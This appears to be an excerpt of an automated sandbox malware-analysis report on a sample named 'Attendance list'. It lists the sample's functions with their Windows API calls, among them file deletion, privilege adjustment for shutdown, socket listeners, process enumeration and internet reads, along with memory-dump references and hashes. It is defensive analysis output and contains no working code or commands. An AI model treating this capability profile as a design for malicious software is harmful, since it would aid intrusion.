                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: 0e7e18e6038d3596e4160b0a4cfcc1f8d6c56df45def63c2ccb62a70c3f3b256
                        • Instruction ID: 78c14e2caad7a030624d2e0a61fc85110dd05a4ffeebee8ce3fd2a35e166bf42
                        • Opcode Fuzzy Hash: 0e7e18e6038d3596e4160b0a4cfcc1f8d6c56df45def63c2ccb62a70c3f3b256
                        • Instruction Fuzzy Hash: FA21AD392142259FDB10AF24EC19F6A77A8EF05711F11806AF84ADB2B1CB74AC00DF45
                        Function 00923A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                          • Part of subcall function 00924CD3: GetFileAttributesW.KERNEL32(?,00923947), ref: 00924CD4
                        • FindFirstFileW.KERNEL32(?,?), ref: 00923ADF
                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00923B87
                        • MoveFileW.KERNEL32(?,?), ref: 00923B9A
                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00923BB7
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00923BD9
                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00923BF5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                        • String ID: \*.*
                        • API String ID: 4002782344-1173974218
                        • Opcode ID: 2b38e75378a829910ee1d454d2bd81d25e73f0183917dafc9028dc54319fa05a
                        • Instruction ID: cad65488ce3f592cdf9040e18a62e078a7f0a17a367eac99cc8691ea5d7f850d
                        • Opcode Fuzzy Hash: 2b38e75378a829910ee1d454d2bd81d25e73f0183917dafc9028dc54319fa05a
                        • Instruction Fuzzy Hash: BE516D3180516D9ACF15EBA4ED92EEDB778AF14300F248169E442B7095DF34AF09CBA1
                        Function 0092F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0092F6AB
                        • Sleep.KERNEL32(0000000A), ref: 0092F6DB
                        • _wcscmp.LIBCMT ref: 0092F6EF
                        • _wcscmp.LIBCMT ref: 0092F70A
                        • FindNextFileW.KERNEL32(?,?), ref: 0092F7A8
                        • FindClose.KERNEL32(00000000), ref: 0092F7BE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                        • String ID: *.*
                        • API String ID: 713712311-438819550
                        • Opcode ID: e04e0d1c249ddced6c3aed2dd088806d44a99a674539d3f13b9db2fbd559c16e
                        • Instruction ID: 789718dc0b33b847f649c344170be02716ac58afdf6be6f721c632a454fe56b9
                        • Opcode Fuzzy Hash: e04e0d1c249ddced6c3aed2dd088806d44a99a674539d3f13b9db2fbd559c16e
                        • Instruction Fuzzy Hash: D2416E7690422A9FCF11DF64DC99EEEBBB8FF05310F14457AE819A2190DB309E44CB91
                        Function 008D4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: b25cec2315eec39b4c7b34a51afe5e71d115f39eae40a6ea98ecd4a0130181a9
                        • Instruction ID: 46ce511fe82dc29b14ed50d4fac0c8035f293247d86edd6ebfcf46cd94443481
                        • Opcode Fuzzy Hash: b25cec2315eec39b4c7b34a51afe5e71d115f39eae40a6ea98ecd4a0130181a9
                        • Instruction Fuzzy Hash: 54A25B70E0421A8FDF24CF58C9907AEB7B1FB54314F2496AAD85AE7380D770AE85DB50
                        Function 008D58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: cc6f3d8a8730638c5d72d790188c4969ec5806f2827a422740fc32315a4eb7a2
                        • Instruction ID: 9e1a65b8dbed1317dec8e78b4297fe6266b58a91067d3e078642043897da9901
                        • Opcode Fuzzy Hash: cc6f3d8a8730638c5d72d790188c4969ec5806f2827a422740fc32315a4eb7a2
                        • Instruction Fuzzy Hash: 3E129B70A00609DFDF04DFA9D985AEEB7F5FF48300F10466AE406E7250EB36A991CB51
                        Function 0092545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00918CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00918D0D
                          • Part of subcall function 00918CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00918D3A
                          • Part of subcall function 00918CC3: GetLastError.KERNEL32 ref: 00918D47
                        • ExitWindowsEx.USER32(?,00000000), ref: 0092549B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $@$SeShutdownPrivilege
                        • API String ID: 2234035333-194228
                        • Opcode ID: 90bd8e36b3ea2df60187fdce22589e05d6c359d2a73d68a6957286965544bd2f
                        • Instruction ID: da545c3d417be56a39539b303130aa7b85f73392a291219896bb9a44fa803c5e
                        • Opcode Fuzzy Hash: 90bd8e36b3ea2df60187fdce22589e05d6c359d2a73d68a6957286965544bd2f
                        • Instruction Fuzzy Hash: 5001D435665A266AE7287774BC5AFBAB25CAB45353F260521FC06D20E6DAB41C8081A0
                        Function 00936596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009365EF
                        • WSAGetLastError.WSOCK32(00000000), ref: 009365FE
                        • bind.WSOCK32(00000000,?,00000010), ref: 0093661A
                        • listen.WSOCK32(00000000,00000005), ref: 00936629
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936643
                        • closesocket.WSOCK32(00000000,00000000), ref: 00936657
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesocketlistensocket
                        • String ID:
                        • API String ID: 1279440585-0
                        • Opcode ID: b903376c989d7f2e6c6266a213c6181aae48a97450570f25708cab07b75bb970
                        • Instruction ID: 62195ee53227e3f81bd4da6787754479484c345e0c3bc10a4c8d09ef646241a3
                        • Opcode Fuzzy Hash: b903376c989d7f2e6c6266a213c6181aae48a97450570f25708cab07b75bb970
                        • Instruction Fuzzy Hash: CB21CE35600204AFCB00AF28C85AF6EB7B9EF45324F1181A9F95AE73D2CB74AD00DB51
                        Function 008D5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                        • _memmove.LIBCMT ref: 0091062F
                        • _memmove.LIBCMT ref: 00910744
                        • _memmove.LIBCMT ref: 009107EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                        • String ID:
                        • API String ID: 1300846289-0
                        • Opcode ID: 3f6fcef897ead3342cc1b53dfcd93f1b0639fae3eb479f83fc352adcfa21ea31
                        • Instruction ID: 840904b8e8d78febf29000fda3b8cbc33e00e3448dc582543c0e96f1885c6850
                        • Opcode Fuzzy Hash: 3f6fcef897ead3342cc1b53dfcd93f1b0639fae3eb479f83fc352adcfa21ea31
                        • Instruction Fuzzy Hash: 2D029271A00109DBDF04DF69D981AAE7BF5FF84300F14806AE80ADB395EB75DA90DB91
                        Function 008C1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 008C19FA
                        • GetSysColor.USER32(0000000F), ref: 008C1A4E
                        • SetBkColor.GDI32(?,00000000), ref: 008C1A61
                          • Part of subcall function 008C1290: DefDlgProcW.USER32(?,00000020,?), ref: 008C12D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ColorProc$LongWindow
                        • String ID:
                        • API String ID: 3744519093-0
                        • Opcode ID: 88c6473aa534df0362bb7b504773a312972e6f159ddb483faab19afae363f478
                        • Instruction ID: 37ef0679b4d512ffbf2c4f117855e4367fd4f9093446e1a3321f32b7ea682f5b
                        • Opcode Fuzzy Hash: 88c6473aa534df0362bb7b504773a312972e6f159ddb483faab19afae363f478
                        • Instruction Fuzzy Hash: CDA115B111656CBAEE28AA399CDCF7B29BDFB83759B14011DF502D6193CA34CD0192B2
                        Function 00936A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009380CB
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00936AB1
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936ADA
                        • bind.WSOCK32(00000000,?,00000010), ref: 00936B13
                        • WSAGetLastError.WSOCK32(00000000), ref: 00936B20
                        • closesocket.WSOCK32(00000000,00000000), ref: 00936B34
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 99427753-0
                        • Opcode ID: 1c4d90ecd499f2481df5b61edff4c29f3c043c20ac8b011a1bbebd64454f3cb2
                        • Instruction ID: 1edb477add6617dc484eb431fed7be87fa7e036aa054323d81ad60aa27beb9f1
                        • Opcode Fuzzy Hash: 1c4d90ecd499f2481df5b61edff4c29f3c043c20ac8b011a1bbebd64454f3cb2
                        • Instruction Fuzzy Hash: 5141B475740610AFEB10AF28DC86F6E77B8EB45710F04809CF95AEB3C2CA749D008B92
                        Function 009455FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: 49598160a179b7cc00052ad9369bc7b519c0fe21473dbb08568ecf0ae8d5c099
                        • Instruction ID: 7b6467cd32b7ef001cefb90b7ed93747dec21876d0939680970e2237ab07f106
                        • Opcode Fuzzy Hash: 49598160a179b7cc00052ad9369bc7b519c0fe21473dbb08568ecf0ae8d5c099
                        • Instruction Fuzzy Hash: F811D0313009216FE7212F66DC18F2B7BACFF45720B434428F806D3252CB30D901CAA5
                        Function 0093C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00901D88,?), ref: 0093C312
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0093C324
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                        • API String ID: 2574300362-1816364905
                        • Opcode ID: 27ae0f8aafcde372013bba0e1dadc548ca9022ec6bccca25621b1da19fb8def0
                        • Instruction ID: a1135e500a4c6368ecd962c9faf6e58525dec544741dc2f2a6ebbbb587612bae
                        • Opcode Fuzzy Hash: 27ae0f8aafcde372013bba0e1dadc548ca9022ec6bccca25621b1da19fb8def0
                        • Instruction Fuzzy Hash: BCE012B4614B13CFDB205F65D814E5676D8EF4E799F80C439E999E2250E770D840CF60
                        Function 008D3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __itow__swprintf
                        • String ID:
                        • API String ID: 674341424-0
                        • Opcode ID: 7ce933009fc02ec253452de2338e696faf0067e19b41e02551392324c84e7334
                        • Instruction ID: 5335fbdb91815af2dfa993ad9ecfcb95249d517bfa6b29390ae491bdb3a267bf
                        • Opcode Fuzzy Hash: 7ce933009fc02ec253452de2338e696faf0067e19b41e02551392324c84e7334
                        • Instruction Fuzzy Hash: E12255716083019FD724DB68D891B6AB7E5FB84314F004A2EF49A97391DB71EA44CB93
                        Function 0093F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0093F151
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0093F15F
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • Process32NextW.KERNEL32(00000000,?), ref: 0093F21F
                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0093F22E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                        • String ID:
                        • API String ID: 2576544623-0
                        • Opcode ID: 8199327c7cb9fe4d44ca1e0a3165897b953cc0b8475e334c871a7adb75d9af02
                        • Instruction ID: 1b7ad6b3231f5a56ca69bddfe26003eb5b961281f5fdce2294fd7e7685b98ba2
                        • Opcode Fuzzy Hash: 8199327c7cb9fe4d44ca1e0a3165897b953cc0b8475e334c871a7adb75d9af02
                        • Instruction Fuzzy Hash: 03513771508711ABD310EF24D895F6BBBE8FF98710F14482DF596D62A1EB70E908CB92
                        Function 009240B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009240D1
                        • _memset.LIBCMT ref: 009240F2
                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00924144
                        • CloseHandle.KERNEL32(00000000), ref: 0092414D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseControlCreateDeviceFileHandle_memset
                        • String ID:
                        • API String ID: 1157408455-0
                        • Opcode ID: f477b4374fe326d6a5f3f263f163d6f0c189712a82f40c75dbf942995fcb2691
                        • Instruction ID: f6880f49ccc4346ac4118f85faec7765d5b835ac561b4db477ee163e331b9549
                        • Opcode Fuzzy Hash: f477b4374fe326d6a5f3f263f163d6f0c189712a82f40c75dbf942995fcb2691
                        • Instruction Fuzzy Hash: 2711EB759012387AD7305BA5AC4DFABBB7CEF45760F1041A6F908D7180D6744E808BA4
                        Function 0091EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0091EB19
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: 92d9b6d6d9db2d82700041a0eeddec467abc8cf479ec4e5581ac6f64dc8bd388
                        • Instruction ID: a6724e6f7c3c5b9ab71745b69feb64a8512ed489aac5793624f1112701ea132d
                        • Opcode Fuzzy Hash: 92d9b6d6d9db2d82700041a0eeddec467abc8cf479ec4e5581ac6f64dc8bd388
                        • Instruction Fuzzy Hash: 59323775A047099FDB28CF19C491AAAB7F1FF48310B15C56EE89ADB3A1D770E981CB40
                        Function 009325E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 009326D5
                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0093270C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Internet$AvailableDataFileQueryRead
                        • String ID:
                        • API String ID: 599397726-0
                        • Opcode ID: 8b7779c6a0309eb3605cb64928aa07105aeb443ff12defc5ddda7a7347d702ec
                        • Instruction ID: 72af99b42bff66cedbb85e62abec92d3f564454ba72d76c7a7f96dc476d3a4f2
                        • Opcode Fuzzy Hash: 8b7779c6a0309eb3605cb64928aa07105aeb443ff12defc5ddda7a7347d702ec
                        • Instruction Fuzzy Hash: E841E471904309BFEB20DB59DC86EBBB7FCFF40728F10446AF605A6140EA75AE419E50
                        Function 0092B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092B5AE
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0092B608
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0092B655
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
